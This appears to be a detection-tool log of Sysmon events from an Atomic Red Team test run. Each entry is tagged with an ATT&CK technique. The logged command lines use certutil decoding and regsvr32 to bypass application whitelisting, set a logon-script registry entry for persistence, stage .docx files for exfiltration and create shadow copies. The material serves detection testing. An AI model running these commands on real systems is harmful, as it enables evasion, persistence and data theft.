Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4073 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:04.529 747F3D96-DA40-5D31-0000-0010E16B3C00 264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1," 1 5 4 1 0 0x8000000000000000 4069 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:04.346 747F3D96-DA40-5D31-0000-0010565D3C00 3932 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DA40-5D31-0000-0010CF5A3C00 4336 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1," 1 5 4 1 0 0x8000000000000000 4068 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:04.316 747F3D96-DA40-5D31-0000-0010CF5A3C00 4336 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1," 1 5 4 1 0 0x8000000000000000 4067 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:04.256 747F3D96-DA40-5D31-0000-0010B1553C00 5168 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DA40-5D31-0000-00106A543C00 6572 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1," 1 5 4 1 0 0x8000000000000000 4066 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:04.236 747F3D96-DA40-5D31-0000-00106A543C00 6572 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4065 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.938 747F3D96-DA3F-5D31-0000-0010813E3C00 7140 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1," 1 5 4 1 0 0x8000000000000000 4064 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.818 747F3D96-DA3F-5D31-0000-001022323C00 6888 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -decode file.txt c:\file.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-DA3F-5D31-0000-0010562E3C00 4020 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1," 1 5 4 1 0 0x8000000000000000 4064 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.818 747F3D96-DA3F-5D31-0000-001022323C00 6888 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -decode file.txt c:\file.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-DA3F-5D31-0000-0010562E3C00 4020 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1," 1 5 4 1 0 0x8000000000000000 4064 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.818 747F3D96-DA3F-5D31-0000-001022323C00 6888 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -decode file.txt c:\file.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-DA3F-5D31-0000-0010562E3C00 4020 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1," 1 5 4 1 0 0x8000000000000000 4063 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.786 747F3D96-DA3F-5D31-0000-0010562E3C00 4020 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1," 1 5 4 1 0 0x8000000000000000 4062 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.261 747F3D96-DA3F-5D31-0000-00109E193C00 1260 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -encode c:\file.exe file.txt C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-DA3F-5D31-0000-00104C173C00 4832 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1," 1 5 4 1 0 0x8000000000000000 4062 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.261 747F3D96-DA3F-5D31-0000-00109E193C00 1260 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil.exe -encode c:\file.exe file.txt C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-DA3F-5D31-0000-00104C173C00 4832 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1," 1 5 4 1 0 0x8000000000000000 4061 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:03.223 747F3D96-DA3F-5D31-0000-00104C173C00 4832 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4054 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:54:16.818 747F3D96-D998-5D31-0000-00101BB73900 2424 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1," 1 5 4 1 0 0x8000000000000000 4053 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:54:16.766 747F3D96-D998-5D31-0000-001008B43900 2000 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4052 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:54:01.940 747F3D96-D989-5D31-0000-0010FC7B3900 4944 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 4049 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:54.968 747F3D96-D982-5D31-0000-0010DC633900 4240 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4048 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:47.230 747F3D96-D97B-5D31-0000-0010F0F03800 6888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," 1 5 4 1 0 0x8000000000000000 4047 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:47.056 747F3D96-D97B-5D31-0000-00109DEB3800 5788 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4047 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:47.056 747F3D96-D97B-5D31-0000-00109DEB3800 5788 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," 1 5 4 1 0 0x8000000000000000 4047 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:53:47.056 747F3D96-D97B-5D31-0000-00109DEB3800 5788 C:\Windows\SysWOW64\regsvr32.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft(C) Register Server Microsoft® Windows® Operating System Microsoft Corporation /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 747F3D96-D97A-5D31-0000-001019DE3800 5828 C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1," 1 5 4 1 0 0x8000000000000000 4128 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.958 747F3D96-DD9E-5D31-0000-00100C3F4B00 5036 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4127 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.875 747F3D96-DD9E-5D31-0000-00106D3A4B00 4208 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image 